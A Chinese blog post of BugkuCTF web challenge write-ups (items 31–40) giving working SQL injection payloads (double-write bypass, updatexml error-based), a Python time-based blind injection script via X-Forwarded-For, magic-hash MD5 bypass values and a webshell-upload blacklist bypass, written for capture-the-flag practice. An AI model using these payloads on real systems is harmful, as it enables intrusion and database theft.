BugkuCTF——WEB(3)

最新推荐文章于 2023-02-06 17:48:32 发布
最新推荐文章于 2023-02-06 17:48:32 发布
阅读量393 收藏 1
点赞数 2
分类专栏: CTF练习 CTF比赛题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43592364/article/details/104059579
版权

三十一、md5 collision

题目网址:http://123.206.87.240:9009/md5.php

 题目要我们传入a的值,参考:https://blog.csdn.net/qq_30464257/article/details/81432446

PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。

攻击者可以利用这一漏洞,通过输入一个经过哈希后以”0E”开头的字符串,即会被PHP解释为0,如果数据库中存在这种哈希值以”0E”开头的密码的话,他就可以以这个用户的身份登录进去,尽管并没有真正的密码。
 


0e开头的md5和原值:

 

s878926199a

0e545993274517709034328855841020

s155964671a

0e342768416822451524974117254469

s214587387a

0e848240448830537924465865611904

s214587387a

0e848240448830537924465865611904

s878926199a

0e545993274517709034328855841020

s1091221200a

0e940624217856561557816327384675

s1885207154a

0e509367213418206700842008763514

s1502113478a

0e861580163291561247404381396064

s1885207154a

0e509367213418206700842008763514

s1836677006a

0e481036490867661113260034900752

s155964671a

0e342768416822451524974117254469

s1184209335a

0e072485820392773389523109082030

s1665632922a

0e731198061491163073197128363787

s1502113478a

0e861580163291561247404381396064

s1836677006a

0e481036490867661113260034900752

s1091221200a

0e940624217856561557816327384675

s155964671a

0e342768416822451524974117254469

s1502113478a

0e861580163291561247404381396064

s155964671a

0e342768416822451524974117254469

s1665632922a

0e731198061491163073197128363787

s155964671a

0e342768416822451524974117254469

s1091221200a

0e940624217856561557816327384675

s1836677006a

0e481036490867661113260034900752

s1885207154a

0e509367213418206700842008763514

s532378020a

0e220463095855511507588041205815

s878926199a

0e545993274517709034328855841020

s1091221200a

0e940624217856561557816327384675

s214587387a

0e848240448830537924465865611904

s1502113478a

0e861580163291561247404381396064

s1091221200a

0e940624217856561557816327384675

s1665632922a

0e731198061491163073197128363787

s1885207154a

0e509367213418206700842008763514

s1836677006a

0e481036490867661113260034900752

s1665632922a

0e731198061491163073197128363787

s878926199a

0e545993274517709034328855841020
 

三十二、程序员本地网站 

题目网址:http://123.206.87.240:8002/localhost/

这道题之前做过一个一样的,抓包将X-Forwarded-For改成127.0.0.1就好

三十三、各种绕过

题目网址:http://123.206.87.240:8002/web7/

题目直接展示出了源代码,这里不懂得就是sha1()这个函数,上网查询后得知这也是哈希加密的算法,所以我们还是通过数组来绕过

三十四、web8

题目网址:http://123.206.87.240:8002/web8/

打开后也直接给了我们php的代码,看来想要我们审计代码,其中

file_get_contents() 函数把整个文件读入一个字符串中

题目还提示了txt,尝试访问flag.txt

并且想得到flag,要达到下面三个条件:就要让ac的值不为空,f的值从文件fn中获取,ac的值要恒等于f的值

构造

?ac=flags&fn=flag.txt

三十五、细心

题目网址:http://123.206.87.240:8002/web13/

题目提示想办法变成admin,这里查看一下源码,也没有什么发现,使用御剑扫描一下发现一个robots.txt

点开之后发现如下

那么我们访问一下sesusl.php

看到通过get方式传递x的值,那就传递x=admin,得到flag

三十六、求getshell

题目网址:http://123.206.87.240:8002/web9/

这种题目见的比较多了,想办法上传一句话木马文件即可

这里是黑名单过滤来判断文件后缀,依次尝试php4,phtml,phtm,phps,php5(包括一些字母改变大小写)
最终发现,php5可以绕过

接下来,请求数据的Content-Type字段改为 image/jpeg

上面还有一个请求头Content-Type字段,大小写绕过: Multipart/form-data;

三十七、INSERT INTO 注入

题目网址:http://123.206.87.240:8002/web15/

题目已经给我们提供了源代码

<?php
    error_reporting(0);
    function getIp(){
        $ip = '';
        if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
            $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        }else{
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        $ip_arr = explode(',', $ip);
        return $ip_arr[0];
    }
    $host="localhost";
    $user="";
    $pass="";
    $db="";
    $connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
    mysql_select_db($db) or die("Unable to select database");
    $ip = getIp();
    echo 'your ip is :'.$ip;
    $sql="insert into client_ip (ip) values ('$ip')";
    mysql_query($sql);
?>

可知注入点在$sql存储的字符串中,并且,“ , ”被过滤

这是X_FORWARDED_FOR注入,但是过滤了“ , ”,在“ , ”被过滤的情况下,无法使用if语句,则使用

select case when xxx then xxx else xxx end;

因为逗号被过滤,无法使用substr和substring,但是这里可以使用from 1 for 1替代 

1'+(select case when substr((select flag from flag) from 1 for 1)='a' then sleep(5) else 0 end))%23  

最后使用python脚本(参考博客:https://www.jianshu.com/p/e58140710647) 

import requests
import sys
# 基于时间的盲注,过滤了逗号 ,
sql = "127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))-- +"
url = 'http://123.206.87.240:8002/web15/'
flag = ''
for i in range(1, 40):
    print('正在猜测:', str(i))
    for ch in range(32, 129):
        if ch == 128:
            sys.exit(0)
        sqli = sql.format(i, chr(ch))
        # print(sqli)
        header = {
            'X-Forwarded-For': sqli
        }
        try:
            html = requests.get(url, headers=header, timeout=3)
        except:
            flag += chr(ch)
            print(flag)
            break

运行脚本,得出flag

三十八、这是一个神奇的登陆框 

这道题也崩了,报404

三十九、多次 

题目网址:http://123.206.87.240:9004/1ndex.php?id=1

将url中的id值从1测到5可知可以在这进行SQL注入,5之后只会报error了

 

登陆后发现页面没有啥信息,但是url地址栏?id=1 可能存在注入

 

id=1后面加单引号会报错,后面加--+注释返回正常,确定存在SQL注入

?id=1'or 1=1--+ 也报错,可能存在过滤

尝试双写绕过,?id=1'oorr 1=1--+ 返回正常

 

通过异或注入,两个条件相同(同真或同假)即为假

123.206.87.240:9004/1ndex.php?id=1'^(length('union')!=0)--+

如果返回页面显示正常,那就证明length(‘union’)==0的,也就是union被过滤了

同理测试出被过滤的字符串有:and,or,union,select

都用双写来绕过,payload如下:

爆数据表 (注意:information里面也有or)

123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

 

爆字段

123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1, group_concat(column_name) from infoorrmation_schema.columns where table_name='flag1'--+

 

爆数据

123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1, group_concat(flag1) from flag1--+

 

提交flag显示错误,换个字段,爆address,得出下一关地址

123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1, group_concat(address) from flag1--+

进去又是一个SQL注入

大小写绕过pass,双写绕过pass

这里利用 updatexml() 函数报错注入

首先了解下updatexml()函数

UPDATEXML (XML_document, XPath_string, new_value); 

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 

第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。

第三个参数:new_value,String格式,替换查找到的符合条件的数据  

作用:改变文档中符合条件的节点的值

改变XML_document中符合XPATH_string的值

而我们的注入语句为:updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

其中的 concat() 函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出

ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

payload 如下

查数据表

123.206.87.240:9004/Once_More.php?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),3) %23

 查字段

?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag2'),'~'),3) %23

查数据

?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),3) %23 

最后爆出 flag(参考博客:https://blog.csdn.net/qq_26090065/article/details/82708691

四十、PHP_encrypt_1

参考博客:https://blog.csdn.net/qq_19861715/article/details/79385075

题目下载的zip包解压后为代码

<?php
function encrypt($data,$key)
{
    $key = md5('ISCC');
    $x = 0;
    $len = strlen($data);
    $klen = strlen($key);
    for ($i=0; $i < $len; $i++) { 
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
    }
    for ($i=0; $i < $len; $i++) {
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
    }
    return base64_encode($str);
}
?>

根据encrypt写出decrypt

<?php
function decrypt($str) {
    $mkey = "729623334f0aa2784a1599fd374c120d";
    $klen = strlen($mkey);
    $tmp = $str;
    $tmp = base64_decode($tmp);  // 对 base64 后的字符串 decode
    $md_len = strlen($tmp); //获取字符串长度
    $x = 0;
    $char = "";
    for($i=0;$i < $md_len;$i++) {  //  取二次加密用 key;
        if ($x == $klen)  // 数据长度是否超过 key 长度检测
            $x = 0;
        $char .= $mkey[$x];  // 从 key 中取二次加密用 key
        $x+=1;
    }
    $md_data = array();
    for($i=0;$i<$md_len;$i++) { // 取偏移后密文数据
        array_push($md_data, ord($tmp[$i]));
    }
    $md_data_source = array();
    $data1 = "";
    $data2 = "";
    foreach ($md_data as $key => $value) { // 对偏移后的密文数据进行还原
        $i = $key;
        if($i >= strlen($mkey)) {$i = $i - strlen($mkey);}
        $dd = $value;
        $od = ord($mkey[$i]);
        array_push($md_data_source,$dd);
        $data1 .= chr(($dd+128)-$od);  // 第一种可能, 余数+128-key 为回归数
        $data2 .= chr($dd-$od);  // 第二种可能, 余数直接-key 为回归数
    }
    print "data1 => ".$data1."<br>\n";
    print "data2 => ".$data2."<br>\n";
}
$str = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=";
decrypt($str);
?>

flag为:Flag:{asdqwdfasfdawfefqwdqwdadwqadawd}

 

到这里,题目难度明显增加了,一些题目都需要参考其他大佬的博客


 

 

 


 

 

零一天地
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
siteserver远程模板下载Getshell漏洞
Jiajiajiang_的博客
03-28 4280
此处不做分析,只做漏洞的复现。 参考:https://www.freebuf.com/articles/web/195105.html 准备工作: 需要一台公网服务器,一个有漏洞的站点(肯定的对8)。 第一步 先写一个马,此处是aspx站点,自然是aspx的马,但因为会有拦截等,所以构造如下的马。 <%@ Page Language="Jscript" Debug=true%&...
BugKuCTF WEB
让我再浪一会 的博客
11-24 605
文章目录BugKuCTF WEB一、web2二、计算器三、web基础$_GET四、web基础$_POST五、矛盾六、web3七、域名解析八、你必须让他停下九、变量1十、web5十一、头等舱十二、网站被黑十三、管理员系统十四、web4十五、flag在index里十六、输入密码查看flag BugKuCTF WEB 平台地址 一、web2 进入网页,查看源代码,在其中找到flag 二、计算器 进入网页,根据题目可得知需要输入运算结果,但限制了输入的数字的个数,查看网页的JS代码,将 maxlength =
SQL注入绕过知识收集总结
weidaxueshen1的博客
12-14 395
if((条件),m,n)语句:若条件为真 返回m,若条件为假 返回n mid(database(),m,n):返回数据库名的第m位之后的n位; substr(“a” from ‘1’ for 1)从字符(从字符开始)1开始取一个字符(基于时间的盲注可用来猜解数据)也可逗号绕过 将其与sleep - if语句结合: select thisdate from bbsmember where i...
CTF_Web:8位以内可控字符getshell
AFCC_的博客(Web_Dog)
08-04 1542
题目来源 近期在练习CTF中的web题目时遇到一个8位字符以内可以随意执行命令,最终需要getshell 的题目,发现很多前辈都写了这类型的题解,但也需要自己实践一下,题目源码访问后如图: 思路:可以看出当提交的参数1包含的值少于8位时,都会当作命令执行,首先?1=ls发现所有文件名都超过了8位,显然单靠这8位执行命令是不足以cat某个文件,于是需要利用拼接文件名执行代码getshell。 解题利用知识点 >a "在linux中会直接创建这个文件,但没有内容" ls -t "将目录中的文件以时间顺
记一次文件下载getshell白盒
weixin_42508548的博客
02-06 271
闲来无事,逛逛代码仓库,扫一扫,看到某CMS里面有这么一个方法,里面的内容很简单,可以说是目测存在getshell漏洞。这个漏洞我好像分析了2个小时吧,主要是构造payload方面花了心思,一开始没想看很多代码,直接利用发现失败了,调试了几次终于可以利用,总的来说,利用条件苛刻,可利用性不高,聊胜于无。其中写入后的文件后缀即为传入的URL中的文件后缀。7、后面循环无影响,到$picx的赋值,因最后拼接的路径为src="后的字符,故将index.php放到文件的最后面,然后调用了downpic方法。
面试题——WEB相关(一)
qq_44029310的博客
09-07 854
本文涉及的有:Redis未授权访问漏洞如何入侵利用,SSRF漏洞原理、利用方式及修复方案?Java和PHP的SSRF区别,CORS原理和检测,XSS持久化如何实现,MySQL 提权有几种方式,简单说说。
BugkuCTF笔记——web
weixin_41889503的博客
12-30 666
1.web2 按F12 2. 发现框里面只能输一个数字,按F12,把maxlength改成3,再在框里输入计算后的正确结果 3.web基础$_GET ?后面是传递的参数。 格式为:网页?参数名=参数值  4。web基础$_POST 和上题类似 5.矛盾 题目 查一下is_numeric函数 则num既不能是数字字符,但是又要等于1 想到用科学计数法表示数字...
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
根据所提供的文件内容,我们可以得知,这是一个针对“bugku ctf misc wp.pdf”文件的CTF(Capture The Flag)比赛中的misc(杂项)类别题目的write-up(解答过程记录)。Misc类别通常包含各种非传统类型的题目,要求...
ADS Writeup_ads_
10-03
Advanced Data Structure Writeup
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
关于数据库的函数
weixin_30505043的博客
07-04 127
Mid(database() from 1 for 1)==mid(databse(),1,1) 在数据库中字符型字段中条件值为false可以获取全部数据 数据库一般有三种报错 (1)Extractvalue()中第一个为错误参数就会错误报出第二个参数语句 (2)Floor(rand(0)*2) 插入虚拟表时出现键相同,导致的报错 (3)Updatexml ()中第一个,第三个,为错...
select 1 from ... sql语句中的1代表什么意思?
热门推荐
02-05 2万+
 select  1 from ..., sql语句中的1代表什么意思?查出来是个什么结果?        select 1 from table;与select anycol(目的表集合中的任意一行) from table;与select * from table 从作用上来说是没有差别的,都是查看是否有记录,一般是作条件查询用的。select 1 from 中的1是一常量(可以为任意数
SQL注入文件读取通过from for分页读取
weixin_30719711的博客
07-11 429
http://103.238.227.13:10088/?id=1 在读取文件的时候发现不能够一下子全部读取出来。经过百度学习了一下,看到别人使用from for说实在此前真不知道这操作。 先来看一下from for吧 1 mysql> select database(); 2 +------------+ 3 | database() | 4 +-----...
我的WafBypass之道(SQL注入篇)
weixin_34197488的博客
03-19 450
原帖地址:https://xianzhi.aliyun.com/forum/read/349.html 0x00 前言 去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常 谈的话题也没什么可写的。 很多人一遇到waf就发懵,不知如何是好,能搜到的各 种姿势也是然并卵。 但是积累姿势的过程也是迭代的,那么就有了此文,用来总 结一些学习和培养突破waf的思想。 可能总结的...
BugkuCTF---管理员系统
qq_43592364的博客
04-14 2977
题目链接:链接 打开题目链接,看到的是一个登陆界面,还是先随便试一下用户名和登陆密码吧 提示是:IP禁止访问,请联系本地管理员登陆,IP已被记录 那就看一下页面元素,发现了一堆Base64的密文,那就用Hackbar来解密一下试试 得到了一个test123的字符串,那就试一试会不会是用户名和密码 结果还是一样没有任何变化,提示依旧是联系本地管理员,那不如试一下伪造成本地登录 用burps...
BugkuCTF 字符?正则?
最新发布
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和正则表达式,在CTF比赛中常常会遇到需要处理字符或者利用正则表达式来解题的情况。例如,有些题目会提供一段加密后的字符串,参赛者需要根据加密算法进行解密,获取隐藏在其中的flag。而在其他题目中,可能会给出一段文本,并要求参赛者使用正则表达式来匹配特定的模式或者提取特定的信息。 因此,在BugkuCTF中,对字符处理和正则表达式的理解和熟练应用是非常重要的技能之一。参赛者需要具备对字符编码、字符串操作、基本正则表达式语法等方面的知识,并能够灵活运用这些技巧来解决各种与字符和正则相关的题目。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值